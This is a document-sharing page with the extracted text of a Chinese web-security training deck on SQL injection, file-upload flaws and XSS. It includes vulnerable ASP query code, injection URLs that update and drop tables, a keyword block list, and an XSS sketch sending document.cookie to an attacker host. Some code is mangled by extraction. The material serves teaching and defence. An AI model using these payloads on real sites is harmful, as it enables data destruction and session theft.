系统安全培训-Web安全性-ppt课件精品文档.ppt





《系统安全培训-Web安全性-ppt课件精品文档.ppt》由会员分享,可在线阅读,更多相关《系统安全培训-Web安全性-ppt课件精品文档.ppt(37页珍藏版)》请在淘文阁 - 分享文档赚钱的网站上搜索。
1、系统安全Web安全性2019年9月2009中国计算机网络安全应急年会资料安全性问题之一SQL注入n什么是 SQL Injection: (SQL注入)就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。简而言之,是在输入的数据字符串中夹带SQL指令,在设计不良的程序中忽略了检查,那么在这些夹带的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此招致到破坏安全性问题之一SQL注入nSQL Injection: (SQL注入)SQL注入是最常见的攻击方式,它的主要原理是:攻击者通过改变WEB页的参数,直接将SQL片断提交到服务器,并在服务器
2、端执行的过程。安全性问题之一SQL注入nSQL注入的原因1、在应用程序中使用字符串联结方式组合SQL指令2、在应用程序链接数据库时使用权限过大的帐号(例如使用SA)3、在数据库中开放了不必要但权力过大的功能(如,在SQLServer中的的xp_cmdshell延伸预存程序或是OLE Automation预存程序等)4、太过于信任用户所输入的数据,未限制输入的字符数安全性问题之一SQL注入nSQL注入的危害修改数据库内容删除其它表窃取数据到本地执行系统命令,进而修改或控制操作系统、破坏硬盘数据等n特点攻击耗时少、危害大安全性问题之一SQL注入n问题代码(ASP+MS SQL Server)if
3、Request.QueryString(id) is NoThing then id=1else id=Request.QueryString(id)end ifsql=select title,content from news where id=&idset rs=Server.CreateObject(adodb.Recordset)rs.Open sql,connection,1,1安全性问题之一SQL注入n修改数据库内容提交语句localhost/news.asp?id=1;update news set title=test where title=oldtitle执行语句:sel
4、ect title,content from news where id=1;update news set title=test where title=oldtitle安全性问题之一SQL注入n删除其它表提交语句localhost/news.asp?id=1;drop table tablename执行语句:select title,content from news where id=1;drop table tablename服务器返回的错误信息关键文件路径服务器返回的错误信息如何预防SQL注入?n 从应用程序的角度来讲,我们要做以下三项工作:n1. 转义敏感字符及字符串(SQL的敏感
5、字符包括:n“exec”,”xp_”,”sp_”,”declare”,”Union”,”cmd”,”+”,”/”,”.”,”;”,”,”-”,”%”,”0 x”,”=!-*/()|”,和”空格”)。n2. 屏蔽出错信息:阻止攻击者知道攻击的结果n3. 服务端正式处理之前对提交数据的合法性进行检查(包括:数据类型,数据长度,敏感字符的校验) 。在确认客户端的输入合法之前,服务端拒绝进行关键性的处理操作。如何预防SQL注入?n从实际应用还需要注意:n1. 只要是提交的数据包含非法字符,或者要替换为安全字符,或者提交的数据要替换为默认值。n2. 含有非法字符串的数据提交不应该显示“您所提交的数据非法
6、”等类似的提示。因为对于访问者而言,这是没有必要的。n3. 尽可能完善操作日志记录和错误日记记录。 安全性问题之二上传文件漏洞n伪造客户端绕过上传后缀名检查n可能导致上传木马n解决方法:使用白名单,后台检查防止木马执行的方法n给各个不必要的目录,去掉“执行”权限;删除不需要的程序映射。安全性问题之三XSSnCross-Site Scripting (XSS):(跨站点脚本攻击)XSS是由于Web程序没有对用户提交的HTML内容进行适当的过滤,这样攻击者就可能在你的Web页中插入一些HTML语句,这些语句通过以标签的形式出现。攻击者通常使用跨站脚本攻击来窃取COOKIES 和 SESSION信息
7、,或是欺骗用户将隐私信息暴露给错误对象(又称为钓鱼) 。问题三XSS Results for window.open(attacker? . document.cookie .) Attack Server受害人服务器 受害人客户端 user gets bad linkuser clicks on linkvictim echoes user inputvictim/search.php ? term = . victimattacker安全性问题之三XSSn跨站脚本XSS利用示例Cookie、Sessionn会话CookieASPSESSIONIDXXXXXXXX、JSESSIONID、PH
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 系统安全 培训 Web 安全性 ppt 课件 精品 文档

限制150内